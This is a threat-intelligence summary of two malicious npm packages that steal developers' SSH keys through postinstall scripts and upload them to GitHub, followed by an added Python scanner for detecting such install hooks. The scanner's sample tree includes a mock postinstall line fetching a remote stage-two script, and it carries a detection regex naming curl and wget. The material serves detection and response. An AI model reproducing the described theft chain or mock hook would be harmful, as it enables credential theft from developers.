GitGot: GitHub leveraged by cybercriminals to store stolen data

ReversingLabs found two malicious npm packages, warbeast2000 and kodiak2k, that run postinstall scripts to fetch second-stage JavaScript, read developer SSH keys from ~/.ssh (id_rsa or a file named meow), Base64-encode them, and upload the stolen keys to attacker-controlled GitHub repositories. The kodiak2k package also fetched an archived Empire script and invoked Mimikatz in later versions, indicating attempts at broader credential theft and post-exploitation. #warbeast2000 #kodiak2k #GitHub #ReversingLabs #id_rsa #Mimikatz #Empire

Keypoints

  • Two malicious npm packages—warbeast2000 and kodiak2k—were discovered and removed from npm after ReversingLabs identified their behavior in January.
  • Both packages run a postinstall script that downloads and executes a second-stage JavaScript payload from remote repositories.
  • The second-stage scripts search the victim’s <homedir>/.ssh directory for keys (default id_rsa or a file named meow), Base64-encode the key, and upload it to attacker-controlled GitHub repositories.
  • Later kodiak2k versions also executed an archived Empire framework script and invoked Mimikatz to dump credentials from memory, indicating expanded malicious capabilities.
  • ReversingLabs published SHA1 hashes for many package versions and two second-stage payloads as IOCs; both packages had limited download counts (~400 and ~950 respectively) before removal.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The packages use npm postinstall scripts to run JavaScript: ‘it would launch a postinstall script that fetched and executed a javascript file.’
  • [T1105] Ingress Tool Transfer – The postinstall and follow-on scripts download additional JavaScript payloads: ‘That script downloads another javascript file and executes it.’
  • [T1083] File and Directory Discovery – The second-stage scripts enumerate/read the SSH directory: ‘that script reads the contents of <homedir>/.ssh directory.’
  • [T1005] Data from Local System – The malware reads private SSH keys from local files: ‘read the private ssh key stored in the id_rsa file located in the <homedir>/.ssh directory.’
  • [T1041] Exfiltration Over C2 Channel (or cloud storage) – The stolen keys are uploaded externally to GitHub: ‘It then uploaded the Base64 encoded key to an attacker-controlled GitHub repository.’
  • [T1003] OS Credential Dumping – kodiak2k invokes Mimikatz to extract credentials from memory: ‘the script also invokes the Mimikatz hacking tool, which is commonly used to dump credentials from process memory.’

Indicators of Compromise

  • [Package name] malicious npm packages – warbeast2000, kodiak2k
  • [SHA1 package hashes] npm package file integrity – example: warbeast2000 1.0.8: 2da32a4c9e2c3f345f46c6e06d6eb41e13da13d9; kodiak2k 1.0.42: 909927bd61f3466d777bbbff38fd844ed8f5c134 (and many more listed in the report).
  • [Second-stage payload SHA1s] downloaded JS payloads – dba623bdad6bdb37359e047efcda34de4af5f518, 9526b820a21fa70641361e061b0f99517ab1b184
  • [Filenames accessed] targeted key files – id_rsa (default SSH private key), meow (placeholder key filename observed)

Both npm packages implement a simple but effective multi-stage procedure: upon installation they execute an npm postinstall script that fetches a remote second-stage JavaScript file and runs it in the victim environment. The second-stage script enumerates the user’s SSH folder, reads specific files (notably the default private key id_rsa or a file named meow), Base64-encodes the key material, and uploads the encoded data to attacker-controlled GitHub repositories.

In kodiak2k’s later versions the actor expanded capabilities by fetching an archived Empire post-exploitation script and invoking Mimikatz to dump credentials from process memory; other observed functions included launching local executables (e.g., notepad.exe, shutdown.exe) and a locally deployed binary named cryptor.exe, suggesting active testing of additional payloads. ReversingLabs published numerous SHA1 hashes for affected package versions and the two second-stage payloads to aid detection and response.

Detection and remediation: remove the listed package versions, verify and rotate any exposed SSH keys (id_rsa or similarly named keys), investigate unusual pushes or uploads to GitHub repositories, and use the provided SHA1 indicators to hunt for known payloads on developer systems.
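The following is an added hunting example written for this summary, not code from ReversingLabs or from either package. It ties the procedure described above (an install-time npm hook that fetches remote JavaScript) to the remediation guidance: it walks a node_modules tree, flags packages whose preinstall/install/postinstall hook pulls remote code, flags the two package names quoted here, and compares the SHA1 of files against the four indicator hashes quoted in the Indicators of Compromise list. The sample tree it builds is constructed for demonstration; the heuristic regex, the hook names checked, and the `.js`/`.tgz` file filter are assumptions, not part of the original report.

```python
"""Hunt a node_modules tree for install-time hooks that fetch remote code and
for files matching published SHA1 indicators.

Added example, not the report's own code. The package names and SHA1 values
are those quoted in the summary; paths, the sample tree and the heuristics
are constructed assumptions."""
import hashlib
import json
import os
import re
import tempfile

# Package names and SHA1 indicators quoted in the summary above.
KNOWN_BAD_PACKAGES = {"warbeast2000", "kodiak2k"}
KNOWN_BAD_SHA1 = {
    "2da32a4c9e2c3f345f46c6e06d6eb41e13da13d9",  # warbeast2000 1.0.8
    "909927bd61f3466d777bbbff38fd844ed8f5c134",  # kodiak2k 1.0.42
    "dba623bdad6bdb37359e047efcda34de4af5f518",  # second-stage payload
    "9526b820a21fa70641361e061b0f99517ab1b184",  # second-stage payload
}
# Lifecycle hooks npm runs automatically during `npm install` (assumed list).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic (assumption): hook text that downloads or evaluates remote content.
REMOTE_FETCH = re.compile(r"https?://|\bcurl\b|\bwget\b|node\s+-e\b", re.I)


def sha1_of(path):
    """SHA1 of a file, read in chunks so large tarballs do not load into memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_node_modules(root):
    """Return a list of (path, reason) findings for everything under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            pj = os.path.join(dirpath, "package.json")
            try:
                with open(pj, encoding="utf-8") as f:
                    meta = json.load(f)
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: skip, not fatal
            name = meta.get("name", "")
            if name in KNOWN_BAD_PACKAGES:
                findings.append((dirpath, f"known malicious package: {name}"))
            scripts = meta.get("scripts") or {}
            for hook in INSTALL_HOOKS:
                cmd = scripts.get(hook)
                if isinstance(cmd, str) and REMOTE_FETCH.search(cmd):
                    findings.append((dirpath, f"{hook} hook fetches remote code: {cmd}"))
        # Hash JavaScript files and tarballs against the published indicators.
        for fn in filenames:
            if fn.endswith((".js", ".tgz")):
                p = os.path.join(dirpath, fn)
                if sha1_of(p) in KNOWN_BAD_SHA1:
                    findings.append((p, "file matches published SHA1 indicator"))
    return findings


def build_sample_tree():
    """Constructed sample: one benign package and one that mimics the
    install-hook pattern described in the summary (the URL is a placeholder)."""
    root = tempfile.mkdtemp(prefix="nm_hunt_")

    def write_pkg(name, scripts):
        d = os.path.join(root, "node_modules", name)
        os.makedirs(d)
        with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as f:
            json.dump({"name": name, "version": "1.0.0", "scripts": scripts}, f)

    write_pkg("left-pad", {"test": "node test.js"})
    write_pkg("warbeast2000", {
        "postinstall": "node -e \"require('https').get('https://example.invalid/stage2.js')\""
    })
    return root


if __name__ == "__main__":
    for path, reason in scan_node_modules(build_sample_tree()):
        print(f"{reason}\n    at {path}")
```

Run it against a real checkout with `scan_node_modules("/path/to/project")`; the hash comparison is exact and will only catch the listed versions, while the hook heuristic is deliberately broad and will surface legitimate native-build packages too, so treat its hits as a triage queue rather than a verdict.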

Read more: https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data